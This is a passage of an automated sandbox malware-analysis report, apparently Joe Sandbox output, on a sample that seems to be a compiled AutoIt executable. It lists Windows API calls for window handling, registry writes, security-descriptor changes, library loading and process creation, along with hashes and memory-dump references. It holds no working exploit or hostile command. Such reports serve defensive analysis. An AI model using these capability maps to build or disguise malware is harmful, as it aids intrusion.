                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 005289E5
                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 005289F5
                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00528A28
                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00528A3C
                                                • GetClientRect.USER32(00000000,000000FF), ref: 00528A5A
                                                • GetStockObject.GDI32(00000011), ref: 00528A76
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00528A81
                                                  • Part of subcall function 0052912D: GetCursorPos.USER32(?), ref: 00529141
                                                  • Part of subcall function 0052912D: ScreenToClient.USER32(00000000,?), ref: 0052915E
                                                  • Part of subcall function 0052912D: GetAsyncKeyState.USER32(00000001), ref: 00529183
                                                  • Part of subcall function 0052912D: GetAsyncKeyState.USER32(00000002), ref: 0052919D
                                                • SetTimer.USER32(00000000,00000000,00000028,005290FC), ref: 00528AA8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                • String ID: AutoIt v3 GUI
                                                • API String ID: 1458621304-248962490
                                                • Opcode ID: d5d970c422ca8c4c55f010799f74d9583bce0dcc5143c72287e03b715905b41b
                                                • Instruction ID: a49518bc8308b6110373f55120e4a08c53023691890e86ad0f41bf4d57921c7d
                                                • Opcode Fuzzy Hash: d5d970c422ca8c4c55f010799f74d9583bce0dcc5143c72287e03b715905b41b
                                                • Instruction Fuzzy Hash: AAB17971A0021A9FDB14DFA8DD89BAE7FB5FB49314F104229FA15EB2D0DB30A840DB55
                                                APIs
                                                  • Part of subcall function 005710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00571114
                                                  • Part of subcall function 005710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571120
                                                  • Part of subcall function 005710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 0057112F
                                                  • Part of subcall function 005710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571136
                                                  • Part of subcall function 005710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0057114D
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00570DF5
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00570E29
                                                • GetLengthSid.ADVAPI32(?), ref: 00570E40
                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00570E7A
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00570E96
                                                • GetLengthSid.ADVAPI32(?), ref: 00570EAD
                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00570EB5
                                                • HeapAlloc.KERNEL32(00000000), ref: 00570EBC
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00570EDD
                                                • CopySid.ADVAPI32(00000000), ref: 00570EE4
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00570F13
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00570F35
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00570F47
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570F6E
                                                • HeapFree.KERNEL32(00000000), ref: 00570F75
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570F7E
                                                • HeapFree.KERNEL32(00000000), ref: 00570F85
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570F8E
                                                • HeapFree.KERNEL32(00000000), ref: 00570F95
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00570FA1
                                                • HeapFree.KERNEL32(00000000), ref: 00570FA8
                                                  • Part of subcall function 00571193: GetProcessHeap.KERNEL32(00000008,00570BB1,?,00000000,?,00570BB1,?), ref: 005711A1
                                                  • Part of subcall function 00571193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00570BB1,?), ref: 005711A8
                                                  • Part of subcall function 00571193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00570BB1,?), ref: 005711B7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                • String ID:
                                                • API String ID: 4175595110-0
                                                • Opcode ID: bea69d52af77047b49f5a6392c53582e99e784c421afece7c01ef645d96fe983
                                                • Instruction ID: 94147933d3616d56b47a737123f6dcf21e42dfbca505811c516e75b67ece4b5c
                                                • Opcode Fuzzy Hash: bea69d52af77047b49f5a6392c53582e99e784c421afece7c01ef645d96fe983
                                                • Instruction Fuzzy Hash: 20714B72A0020AEBDF20DFA5EC48BAEBFB8BF15310F148115F919A6191D7719A09DB60
                                                APIs
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059C4BD
                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,005ACC08,00000000,?,00000000,?,?), ref: 0059C544
                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0059C5A4
                                                • _wcslen.LIBCMT ref: 0059C5F4
                                                • _wcslen.LIBCMT ref: 0059C66F
                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0059C6B2
                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0059C7C1
                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0059C84D
                                                • RegCloseKey.ADVAPI32(?), ref: 0059C881
                                                • RegCloseKey.ADVAPI32(00000000), ref: 0059C88E
                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0059C960
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                • API String ID: 9721498-966354055
                                                • Opcode ID: 6acd5b70e59bb7c068546cf1dc1efb49016b56b95f898f8e057102e442d035af
                                                • Instruction ID: 65d6091ea8e7ebefa0a227b30dc96ce80afb7bf4a83d511ccdbefd82c9d558a1
                                                • Opcode Fuzzy Hash: 6acd5b70e59bb7c068546cf1dc1efb49016b56b95f898f8e057102e442d035af
                                                • Instruction Fuzzy Hash: 891248356042029FDB14DF18C895A6ABFE5FF88714F05885DF85A9B3A2DB31ED81CB81
                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 005A09C6
                                                • _wcslen.LIBCMT ref: 005A0A01
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 005A0A54
                                                • _wcslen.LIBCMT ref: 005A0A8A
                                                • _wcslen.LIBCMT ref: 005A0B06
                                                • _wcslen.LIBCMT ref: 005A0B81
                                                  • Part of subcall function 0052F9F2: _wcslen.LIBCMT ref: 0052F9FD
                                                  • Part of subcall function 00572BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00572BFA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                • API String ID: 1103490817-4258414348
                                                • Opcode ID: 183a11114ebdba956d1e227a35ebcf89a2938ea692ca679c3ecc26221646e1a4
                                                • Instruction ID: 0b84ee3c1e562423bf36c7d2a3e3ff1fe8f90e3f4bb890a435a2b89ac42ce134
                                                • Opcode Fuzzy Hash: 183a11114ebdba956d1e227a35ebcf89a2938ea692ca679c3ecc26221646e1a4
                                                • Instruction Fuzzy Hash: 0EE17A312183069FC714DF28C45096EBBE2BF9A314F14895DF8969B3A2D731ED85CB91
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _wcslen$BuffCharUpper
                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                • API String ID: 1256254125-909552448
                                                • Opcode ID: 127438a9f410792700a45c4835133499e74ab092614900d6fa17821f88732fa9
                                                • Instruction ID: eaf357bb85fa78da58079f1accf41328e4737ca79a2a4b9a844b8bb73652b882
                                                • Opcode Fuzzy Hash: 127438a9f410792700a45c4835133499e74ab092614900d6fa17821f88732fa9
                                                • Instruction Fuzzy Hash: 5D71E23260016B8BCF20DE7CC9515BE3FA2BFA5764F650529F8669B284E635CD84C7A0
                                                APIs
                                                • _wcslen.LIBCMT ref: 005A835A
                                                • _wcslen.LIBCMT ref: 005A836E
                                                • _wcslen.LIBCMT ref: 005A8391
                                                • _wcslen.LIBCMT ref: 005A83B4
                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 005A83F2
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,005A5BF2), ref: 005A844E
                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 005A8487
                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 005A84CA
                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 005A8501
                                                • FreeLibrary.KERNEL32(?), ref: 005A850D
                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 005A851D
                                                • DestroyIcon.USER32(?,?,?,?,?,005A5BF2), ref: 005A852C
                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 005A8549
                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 005A8555
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                • String ID: .dll$.exe$.icl
                                                • API String ID: 799131459-1154884017
                                                • Opcode ID: 8dcef1b7d0d98209c2095154804ca46b79036a4fbb0d84f637fee62daa3745be
                                                • Instruction ID: 4000e39377e1ed38495077e0679b0884a2ba5d4673d1438b79dc369000e5dc70
                                                • Opcode Fuzzy Hash: 8dcef1b7d0d98209c2095154804ca46b79036a4fbb0d84f637fee62daa3745be
                                                • Instruction Fuzzy Hash: 9F61E07190020ABFEB14DF64CC45BBE7FA8FB49721F10450AF815DA1D1EB74A980DBA0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                • API String ID: 0-1645009161
                                                • Opcode ID: 534a70174e4acf6e41b15179eb500969b49225a8069b7566fe058f3d59f62035
                                                • Instruction ID: 8b0ea2b4074395fc69489bc7cb3bfefd18196bf34bccab275f2d21d2cdcfb67c
                                                • Opcode Fuzzy Hash: 534a70174e4acf6e41b15179eb500969b49225a8069b7566fe058f3d59f62035
                                                • Instruction Fuzzy Hash: 5B81E67160460ABBEB20AF64DC56FEE3F78FF59300F044025F905AA192EB70D985D7A1
                                                APIs
                                                • LoadIconW.USER32(00000063), ref: 00575A2E
                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00575A40
                                                • SetWindowTextW.USER32(?,?), ref: 00575A57
                                                • GetDlgItem.USER32(?,000003EA), ref: 00575A6C
                                                • SetWindowTextW.USER32(00000000,?), ref: 00575A72
                                                • GetDlgItem.USER32(?,000003E9), ref: 00575A82
                                                • SetWindowTextW.USER32(00000000,?), ref: 00575A88
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00575AA9
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00575AC3
                                                • GetWindowRect.USER32(?,?), ref: 00575ACC
                                                • _wcslen.LIBCMT ref: 00575B33
                                                • SetWindowTextW.USER32(?,?), ref: 00575B6F
                                                • GetDesktopWindow.USER32 ref: 00575B75
                                                • GetWindowRect.USER32(00000000), ref: 00575B7C
                                                • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00575BD3
                                                • GetClientRect.USER32(?,?), ref: 00575BE0
                                                • PostMessageW.USER32(?,00000005,00000000,?), ref: 00575C05
                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00575C2F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                • String ID:
                                                • API String ID: 895679908-0
                                                • Opcode ID: 30612cc84018b78f48cf7f01230e89490f7eba844d435360fa553fc67054d6f2
                                                • Instruction ID: f717d6a50677cd11ac83ddbc175e8d267dfc15700b27c56e0b97a4f71b2ac2ed
                                                • Opcode Fuzzy Hash: 30612cc84018b78f48cf7f01230e89490f7eba844d435360fa553fc67054d6f2
                                                • Instruction Fuzzy Hash: B0717F31900B059FDB20DFA8DE85A6EBFF5FF48705F104918E18AA35A0E7B4E944DB50
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[]
                                                • API String ID: 176396367-4125391415
                                                • Opcode ID: c85ac22828e6aa4ecbafa830eb0d43ad4ccbc1c81dd54fbe0dc067889a816da8
                                                • Instruction ID: 4fce7546877220f89ca9fbb137fdb8872f5243ea5fc453e8c3f1c017bfd1431e
                                                • Opcode Fuzzy Hash: c85ac22828e6aa4ecbafa830eb0d43ad4ccbc1c81dd54fbe0dc067889a816da8
                                                • Instruction Fuzzy Hash: FCE1E732A00516ABCF28DF78D4556EDBFB1BF44720F54C52AE45AA7240EB30AE85F790
                                                APIs
                                                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 005300C6
                                                  • Part of subcall function 005300ED: InitializeCriticalSectionAndSpinCount.KERNEL32(005E070C,00000FA0,5FA4A451,?,?,?,?,005523B3,000000FF), ref: 0053011C
                                                  • Part of subcall function 005300ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,005523B3,000000FF), ref: 00530127
                                                  • Part of subcall function 005300ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,005523B3,000000FF), ref: 00530138
                                                  • Part of subcall function 005300ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0053014E
                                                  • Part of subcall function 005300ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0053015C
                                                  • Part of subcall function 005300ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0053016A
                                                  • Part of subcall function 005300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00530195
                                                  • Part of subcall function 005300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 005301A0
                                                • ___scrt_fastfail.LIBCMT ref: 005300E7
                                                  • Part of subcall function 005300A3: __onexit.LIBCMT ref: 005300A9
                                                Strings
                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00530122
                                                • kernel32.dll, xrefs: 00530133
                                                • InitializeConditionVariable, xrefs: 00530148
                                                • SleepConditionVariableCS, xrefs: 00530154
                                                • WakeAllConditionVariable, xrefs: 00530162
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                • API String ID: 66158676-1714406822
                                                • Opcode ID: 7b9d8a64aef4c36090ce989931249560b62d120c9820ec9e071151759eed3783
                                                • Instruction ID: 2b027beda6b6cd48bbc23366fbf28800fc68745221f96054de72aafd0fca023f
                                                • Opcode Fuzzy Hash: 7b9d8a64aef4c36090ce989931249560b62d120c9820ec9e071151759eed3783
                                                • Instruction Fuzzy Hash: 63212632A407116BE7256BA4BC59B2E7FE8FB56B61F00113AF801E72D1DBB09C04DB90
                                                APIs
                                                • CharLowerBuffW.USER32(00000000,00000000,005ACC08), ref: 00584527
                                                • _wcslen.LIBCMT ref: 0058453B
                                                • _wcslen.LIBCMT ref: 00584599
                                                • _wcslen.LIBCMT ref: 005845F4
                                                • _wcslen.LIBCMT ref: 0058463F
                                                • _wcslen.LIBCMT ref: 005846A7
                                                  • Part of subcall function 0052F9F2: _wcslen.LIBCMT ref: 0052F9FD
                                                • GetDriveTypeW.KERNEL32(?,005D6BF0,00000061), ref: 00584743
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _wcslen$BuffCharDriveLowerType
                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                • API String ID: 2055661098-1000479233
                                                • Opcode ID: 045060e17fed9ee865c530bf999c969e4fb017f404a13b153530e7888972d2fe
                                                • Instruction ID: 52e427e6f0860e730395d9f9e12390ecf223d89397b3e5b1e8fc89aba3b4b925
                                                • Opcode Fuzzy Hash: 045060e17fed9ee865c530bf999c969e4fb017f404a13b153530e7888972d2fe
                                                • Instruction Fuzzy Hash: F2B19D316083039BC710EF28C894A6EBBE5BFA5764F50491DF896E7291E730D985CB92
                                                APIs
                                                  • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                • DragQueryPoint.SHELL32(?,?), ref: 005A9147
                                                  • Part of subcall function 005A7674: ClientToScreen.USER32(?,?), ref: 005A769A
                                                  • Part of subcall function 005A7674: GetWindowRect.USER32(?,?), ref: 005A7710
                                                  • Part of subcall function 005A7674: PtInRect.USER32(?,?,005A8B89), ref: 005A7720
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 005A91B0
                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 005A91BB
                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 005A91DE
                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 005A9225
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 005A923E
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 005A9255
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 005A9277
                                                • DragFinish.SHELL32(?), ref: 005A927E
                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 005A9371
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#^
                                                • API String ID: 221274066-4237971630
                                                • Opcode ID: 5f30679c007cdd16b1e8693ff721ccc44b44fe8e2f45fe8d13d713b40d4e05dc
                                                • Instruction ID: b3122728a10f91d5f26426d0b86c766d0ab4d7bea99136e93a8158366580abd7
                                                • Opcode Fuzzy Hash: 5f30679c007cdd16b1e8693ff721ccc44b44fe8e2f45fe8d13d713b40d4e05dc
                                                • Instruction Fuzzy Hash: 3F613771108302AFD701DF54D889DAFBFE8FFD9750F00091AB595962A1DB309A49CB92
                                                APIs
                                                • _wcslen.LIBCMT ref: 0059B198
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0059B1B0
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0059B1D4
                                                • _wcslen.LIBCMT ref: 0059B200
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0059B214
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0059B236
                                                • _wcslen.LIBCMT ref: 0059B332
                                                  • Part of subcall function 005805A7: GetStdHandle.KERNEL32(000000F6), ref: 005805C6
                                                • _wcslen.LIBCMT ref: 0059B34B
                                                • _wcslen.LIBCMT ref: 0059B366
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0059B3B6
                                                • GetLastError.KERNEL32(00000000), ref: 0059B407
